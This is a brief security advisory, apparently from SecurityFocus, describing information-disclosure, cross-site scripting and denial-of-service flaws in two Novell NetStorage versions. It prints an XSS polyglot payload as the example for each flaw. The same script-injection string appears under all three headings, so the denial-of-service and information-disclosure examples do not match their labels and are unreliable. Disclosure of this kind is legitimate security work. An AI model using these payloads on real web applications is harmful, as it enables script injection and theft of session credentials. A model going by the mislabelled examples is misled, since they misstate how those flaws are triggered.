source: https://www.securityfocus.com/bid/34267/info

Novell NetStorage is prone to the following remote vulnerabilities:

- An information-disclosure vulnerability
- A cross-site scripting vulnerability
- A denial-of-service vulnerability

Attackers can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible.

The following are vulnerable:

NetStorage 3.1.5-19 on Open Enterprise Server (OES)
NetStorage 2.0.1 on NetWare 6.5 SP6

The following examples are available:

Cross-site scripting:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Denial of service:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

Information disclosure:

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>